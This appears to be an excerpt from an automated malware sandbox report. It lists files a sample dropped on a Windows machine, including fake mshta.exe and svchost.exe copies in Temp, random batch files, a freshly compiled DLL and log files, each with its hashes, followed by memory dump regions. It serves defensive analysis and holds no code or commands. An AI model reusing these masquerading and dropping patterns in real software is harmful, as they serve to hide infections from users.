C:\Users\Admin\AppData\Local\Temp\mshta.exe
Filesize
67KB

MD5
092a0c6fe885844fd74947e64e7fc11e

SHA1
bfe46f64f36f2e927d862a1a787f146ed2c01219

SHA256
91431cb73305e0f1fdc698907301b6d312a350f667c50765615672e7f10a68f2

SHA512
022589bd17b46e5486971a59b2517956bb15815266e48dc73a7ae9ac9efd42a348af09df471562eb71ffc94ce1e1845d54ca2994663d1496a385bce50ae595f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ncfjerNzhxVc.bat
Filesize
200B

MD5
d84b7216f69539572652b8ae28ac13fd

SHA1
07d4fd87effc79351edc0ed2a481de3c516aaaa4

SHA256
5286cd0013ceb265372350e47bb4a284cfb690786374c81b3c14498b6a78fc26

SHA512
4e41da27e8214274667a26aca9c65fe5946261fda176964828ef296f917970e4601d61ebdee13d94854ec069b2a77febd12539ff51a6f41b767f7764ef42c06c

Download Submit
C:\Users\Admin\AppData\Local\Temp\pWoo9AFPhpI8.bat
Filesize
209B

MD5
b637aee6ce0f9f1817d08b4b9e3bf164

SHA1
e41e9d95e382f6222aed9943978008edaad47cd8

SHA256
715cd2b92db2198409efe2c17917730f30ee115ec9020cde1774b214def341c0

SHA512
4d7331066b7871abd80b4b95288b0fb386be34b3ccb0924ebe57665911578403344a598be000903ad6c0ec6709151dfbd4398387a012b61497f77791c9579f06

Download Submit
C:\Users\Admin\AppData\Local\Temp\qnut1bbm\qnut1bbm.dll
Filesize
3KB

MD5
c8e7e2216cf4cc83720b149e50f14b7a

SHA1
07e97c530ce8f41fbb7f3c2d1b9c72f90448f86c

SHA256
4a6ef72823396dd9846a6e7c394d24b8189b4ed51723589934162a00421d2919

SHA512
e586993255c4a1a7cfc0b33343a4cfe26121153279599513ff552f84ac01c72338c5fd0f7b4db2ee2526c0e6b6be7f49d0cb269716635414955592edb8e514fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\sMvnoXEY7gNO.bat
Filesize
209B

MD5
e0c844598af9ebbf18348864e1c9354b

SHA1
8c6019b0f7d8b62c29ea48d7fc5e66f541fb8235

SHA256
1b0af6fb5155f27ed21f22ebf71d74d7a84dcd029e50db2d6f0eedc7f174993c

SHA512
0ddc27bc4927c6ff463d88d9d8da7ed60204e7ae8eef5088f5848117ab26859bf7096f179f55b7fe9067b878622c8714a3d2e10b05f8a54bb83f417c5641e1c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe
Filesize
79KB

MD5
1f1b23752df3d29e7604ba52aea85862

SHA1
bb582c6cf022098b171c4c9c7318a51de29ebcf4

SHA256
4834d31394f19d42e8d2a035b4c3c9c36441340ea19fe766396848ecfb608960

SHA512
d52722ab73bb15d4a5b0033351f98f168192f382677e6d474f6cf506cf8dc2f5e421e45279b6cac0f074857f41a865d87b5d989450bfcb8eba925b7baa12fbde

Download Submit
C:\Users\Admin\AppData\Roaming\Logs\06-27-2024
Filesize
224B

MD5
414faf81d22cd7d88adb54a914cf2fc0

SHA1
a42c16af681c55fee62f525f7d7d431eeef8785f

SHA256
b3fea05397b124b2104a9c192e2a4c5418f5af9eb00588d2152266c734742f41

SHA512
f43ebb0088f23579ede3dd8cab102b7716b7cda48099174a8cd75ee4b14168f56d50ba1d925c079c9a6b8b6f569d295850a2e82e801cac9d9203fcb787f0ccca

Download Submit
C:\Users\Admin\AppData\Roaming\Logs\06-27-2024
Filesize
224B

MD5
775a085f2776b4f23f6bb81d4806f4d3

SHA1
814eddbb55fc7ebbde2d6ce9378dc2ee1ae2c9ad

SHA256
4e531ae1f7c061c6cfaf95fb4d7e2cd460ecae99ca1ac52a768e105e122bf431

SHA512
9274a80c2d0d17d79a9813f651d819bfb27bdb50fa928e05828bebc39fe8501b6bba8c227d1972b4b3af6a008418bbd88f59130865f942c63409af6f8da8fa79

Download Submit
C:\Users\Admin\AppData\Roaming\Logs\06-27-2024
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Roaming\Logs\06-27-2024
Filesize
224B

MD5
47268e09931d6b4ee425fbcbb518d2f3

SHA1
c1367856a6828151076752a9e26b12c8282a89be

SHA256
2ca1bb50fcfb5508bcc456920341a8199c876882070aee886a5203fb1fb12879

SHA512
90117088bd3cbbcb5e7812ea6899c43fc8aefd38dfa64c21126cf4f83386245dbeaf6ab520ebebc2293685f689d905f8f5ddae9e93f01adbc4ebd2e9f974a58c

Download Submit
C:\Users\Admin\AppData\Roaming\Logs\06-27-2024
Filesize
224B

MD5
c6ab6afb52a4bdaa4cf7274b7bdc3b6b

SHA1
209a3f612c39ff0476671bf7ffdc60be6ba80d6a

SHA256
244891772a29af344daec8b89f2f003b8c59f69af1da2199a40a911fbda6f74e

SHA512
691c5395b038f02e33f4784d13b73efb1218b9e3065b04fe259c2248ec0e88d45ea7f509d93083731fab005bcddc1a808f4ff5c255bc6cd19f4beae49c3cf505

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qnut1bbm\CSCB55E84BA7648457FB597D1F72D9096C.TMP
Filesize
652B

MD5
020f336d8281d958795f6d1693b6d3d6

SHA1
c1624374192efa10d6e36c800a2aa6b870775107

SHA256
7d4472b24f858eecd8e5bf7a95789c8f8daf1b90bf2e4820da83da9fd1286817

SHA512
5698a380ca92730a08d31c342e9dc299eead17c7f931634ed477e2150d14e84dc0645a16feb46ea2218913327df2f0cdeeeaeb5b62a72c4bd2f79139c41bf3e9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qnut1bbm\qnut1bbm.0.cs
Filesize
737B

MD5
3d57f8f44297464baafa6aeecd3bf4bc

SHA1
f370b4b9f8dba01fbcad979bd663d341f358a509

SHA256
415199eec01052503978381a4f88f4cd970b441fedce519905990ed8b629b0f1

SHA512
4052dd65ca0a505a36c7c344671afcadb8f82cc24b0d1d8362f61565f9d37782e00332908444f6a95286dd1785d074762b27c20be1f361eec67807fad052d798

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qnut1bbm\qnut1bbm.cmdline
Filesize
369B

MD5
b69fab60b60877766b475bff169f4003

SHA1
eba593c925adf106657ae20af2e570e8e37fed3c

SHA256
7fceb69bdc5a2dd99aabecc9710961114bad0910fc97fe452ae3ebaf6b5d4e5a

SHA512
7cc6d09892bd5d5a7aee2e2f1d9f0df2940ab3d78d7eb807e0dc47b55dec24b5d66d0031f2e046a81a23dc9a53b78b4b48f75076cfcb6a3d7441bf407704c709

Download Submit
memory/564-48-0x0000000000140000-0x000000000015A000-memory.dmp

Filesize
104KB

Download
memory/2232-65-0x0000000005260000-0x00000000052F2000-memory.dmp

Filesize
584KB

Download
memory/2232-74-0x0000000005300000-0x0000000005366000-memory.dmp

Filesize
408KB

Download
memory/2232-192-0x0000000006B80000-0x0000000006B8A000-memory.dmp

Filesize
40KB

Download
memory/2232-64-0x0000000005770000-0x0000000005D14000-memory.dmp

Filesize
5.6MB

Download
memory/2232-190-0x000000007544E000-0x000000007544F000-memory.dmp

Filesize
4KB

Download
memory/2232-61-0x0000000000910000-0x000000000097C000-memory.dmp

Filesize
432KB

Download
memory/2232-84-0x0000000005F50000-0x0000000005F62000-memory.dmp

Filesize
72KB

Download
memory/2232-50-0x000000007544E000-0x000000007544F000-memory.dmp

Filesize
4KB

Download
memory/2412-46-0x0000000000B70000-0x0000000000B86000-memory.dmp

Filesize
88KB

Download
memory/3124-99-0x0000024F5CC00000-0x0000024F5CC22000-memory.dmp

Filesize
136KB

Download
memory/3124-127-0x0000024F5CD50000-0x0000024F5CD58000-memory.dmp

Filesize
32KB

Download
memory/3920-1-0x0000000000010000-0x00000000027FE000-memory.dmp

Filesize
39.9MB

Download
memory/3920-0-0x00007FFE14C73000-0x00007FFE14C75000-memory.dmp

Filesize
8KB

Download
memory/4124-75-0x0000000002CE0000-0x0000000002D30000-memory.dmp

Filesize
320KB

Download
memory/4124-63-0x0000000000930000-0x0000000000C54000-memory.dmp

Filesize
3.1MB

Download
memory/4124-76-0x000000001D670000-0x000000001D722000-memory.dmp

Filesize
712KB

Download
memory/4936-183-0x00007FFE14C70000-0x00007FFE15731000-memory.dmp

Filesize
10.8MB

Download
memory/4936-36-0x0000000000C20000-0x0000000000C38000-memory.dmp

Filesize
96KB

Download
memory/4936-49-0x00007FFE14C70000-0x00007FFE15731000-memory.dmp

Filesize
10.8MB

Download